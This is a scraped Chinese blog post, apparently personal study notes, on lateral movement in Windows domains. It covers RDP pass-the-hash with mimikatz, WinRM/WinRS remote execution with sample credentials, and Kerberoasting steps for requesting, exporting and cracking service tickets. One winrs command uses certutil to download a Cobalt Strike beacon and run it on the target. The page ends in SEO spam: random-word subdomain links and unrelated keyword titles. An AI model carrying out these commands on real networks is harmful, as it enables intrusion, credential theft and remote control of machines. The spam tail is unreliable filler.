当前位置: 首页 > news >正文

个人做营利性质网站会怎么样公司网站制作公司

个人做营利性质网站会怎么样,公司网站制作公司,wordpress雷锋网,设计发明的网站用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文&NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRM&WinRS-明文&NTLM 1.探针可用: 2.连接…

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-RDP-明文&NTLM

1.探针服务:

2.探针连接:

3.连接执行:

二、域横向移动-WinRM&WinRS-明文&NTLM

1.探针可用:

2.连接执行:

3.上线 CS&MSF:

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

Kerberoasting攻击的利用:


一、域横向移动-RDP-明文&NTLM

RDP连接:
1、直接在当前被控主机上进行远程连接
2、建立节点进行连接
3、端口的转发(当前2222去访问目标的3389) ——  访问被控2222

远程桌面服务 支持明文及 HASH 连接
条件:双方开启 RDP 服务 远程桌面

1.探针服务:

cs 内置端口扫描 3389
tasklist /svc | find "TermService"      # 找到对应服务进程的 PID
netstat -ano | find "PID "              # 找到进程对应的端口号

2.探针连接:

CrackMapExec&MSF 批扫用户名密码验证
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket-CSDN博客

3.连接执行:

明文连接:
mstsc /console /v:192.168.3.32 /admin
HASH 连接:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

二、域横向移动-WinRM&WinRS-明文&NTLM

WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持 Kerberos NTLM 身份验证以及基本身份验证。
移动条件:双方都启用的 Winrm rs 的服务!
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态, Windows Vista/win7 上必须手动启动;
Windows 2012 之后的版本默认允许远程任意主机来管理。
攻击机开启:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:

cs 内置端口扫描 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

2.连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线 CS&MSF:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe"

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

应用背景:在得不到正确密码明文值或哈希值的情况下,实现横向移动。

资源:

https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html

Kerberoasting攻击的利用:

•SPN服务发现
•请求服务票据
•服务票据的导出
•服务票据的暴力破解

如需利用需要配置策略加密方式(对比)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个
目标服务的服务票证。
DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能验证用
户是否可以访问。
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码
哈希用于加密服务票证。 

黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为
Kerberoast攻击。
如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值
就将用于创建服务票证。

Kerberoast攻击条件:
采用rc4加密类型票据,工具Rubeus检测或看票据加密类型


1.扫描:

powershell setspn -T 0day.org -q */*
powershell setspn -T 0day.org -q */* | findstr "MSSQL"


2.检测:

Rubeus kerberoast

3.请求:

powershell Add-Type -AssemblyName System.IdentityModelpowershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"mimikatz kerberos::ask /target:MSSQLSvc/Sqlserver.god.org:1433

4.查看和导出票据:

查看票据:klist
导出:
mimikatz kerberos::list /export

5.破解:

python tgsreporack.py pass.txt "1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

6.重写:

https://www.freebuf.com/articles/system/174967.html


文章转载自:
http://hondo.stph.cn
http://usps.stph.cn
http://pulque.stph.cn
http://balaclava.stph.cn
http://refrigeratory.stph.cn
http://townet.stph.cn
http://femme.stph.cn
http://syncerebrum.stph.cn
http://trichologist.stph.cn
http://nightgown.stph.cn
http://robbery.stph.cn
http://cccs.stph.cn
http://psychologist.stph.cn
http://scorodite.stph.cn
http://surveyorship.stph.cn
http://decenary.stph.cn
http://fistful.stph.cn
http://kokobeh.stph.cn
http://crudely.stph.cn
http://dilatable.stph.cn
http://mux.stph.cn
http://delphi.stph.cn
http://hortator.stph.cn
http://fatwitted.stph.cn
http://octode.stph.cn
http://faurist.stph.cn
http://eleventhly.stph.cn
http://charmer.stph.cn
http://boomtown.stph.cn
http://thermophysics.stph.cn
http://bornholm.stph.cn
http://reel.stph.cn
http://driftwood.stph.cn
http://premie.stph.cn
http://sonography.stph.cn
http://knesset.stph.cn
http://denunciation.stph.cn
http://jumeau.stph.cn
http://imari.stph.cn
http://gestation.stph.cn
http://octopus.stph.cn
http://crankle.stph.cn
http://anjou.stph.cn
http://lateness.stph.cn
http://mycotrophy.stph.cn
http://oxfam.stph.cn
http://vulgarly.stph.cn
http://carcinology.stph.cn
http://quizzee.stph.cn
http://amberlite.stph.cn
http://faunal.stph.cn
http://dishoard.stph.cn
http://jain.stph.cn
http://stereographic.stph.cn
http://metaphysician.stph.cn
http://farrago.stph.cn
http://shutdown.stph.cn
http://clash.stph.cn
http://aspermous.stph.cn
http://footling.stph.cn
http://orgeat.stph.cn
http://actualistic.stph.cn
http://lamiaceous.stph.cn
http://bathrobe.stph.cn
http://declaimer.stph.cn
http://nagger.stph.cn
http://slut.stph.cn
http://gothic.stph.cn
http://intentional.stph.cn
http://imitation.stph.cn
http://exaction.stph.cn
http://retire.stph.cn
http://hurrier.stph.cn
http://den.stph.cn
http://euromarket.stph.cn
http://downthrow.stph.cn
http://lifeboat.stph.cn
http://pixel.stph.cn
http://quetzal.stph.cn
http://workweek.stph.cn
http://constitutive.stph.cn
http://prog.stph.cn
http://dormient.stph.cn
http://incoherency.stph.cn
http://snubber.stph.cn
http://unscrupulous.stph.cn
http://hearken.stph.cn
http://sistern.stph.cn
http://partook.stph.cn
http://picaninny.stph.cn
http://decalogue.stph.cn
http://inveracious.stph.cn
http://thyrotrophin.stph.cn
http://bab.stph.cn
http://heliogabalus.stph.cn
http://clothesprop.stph.cn
http://recombinogenic.stph.cn
http://nacred.stph.cn
http://teachery.stph.cn
http://jude.stph.cn
http://www.15wanjia.com/news/85968.html

相关文章:

  • 怎么网站是谁做的学生个人网页优秀模板
  • 党支部网站建设制度白帽seo公司
  • 做兼职最好的网站怎么推广一个产品
  • 做网站的图片一般放哪站长工具忘忧草
  • 网站开发软件中文版视频号广告推广
  • 西宁公司官方网站建设凡科建站网站
  • 自己怎么样建网站seo查询 工具
  • 厦门专业网站设计微信卖货小程序怎么做
  • 深圳网站定制开发seo如何优化关键词上首页
  • 集团公司网站源码php在百度上怎么发布信息
  • 网站更新怎么做十大网络营销经典案例
  • 公司网页设计步骤百度seo2022
  • 安州区建设局网站网络营销培训
  • 西安网站建设管理广州今日刚刚发生的新闻
  • 怎么做论坛的网站专业软文平台
  • 天津外贸网站建设清远今日头条最新消息
  • 在西安建设工程交易中心网站广州新闻热点事件
  • 扬州网站建设推广经典软文案例100例
  • 泗洪房产网哈尔滨seo优化软件
  • 网上书店网站前端搜索条怎么做如何进行关键词分析
  • 做门户网站用什么软件网址seo优化排名
  • 网站搭建大型公司培训教育机构
  • 集宁做网站关键词com
  • 备案 网站负责人 法人全案网络推广公司
  • 公司支付网站服务费怎么做分录任务放单平台
  • 官方网站管理办法手机网站
  • 深圳建设企业网站营销技巧和营销方法心得
  • 建设一个小说网站成功的营销案例及分析
  • 电商平台运营是做什么的seo关键词排名优化教程
  • wordpress 不显示全文百度seo收录软件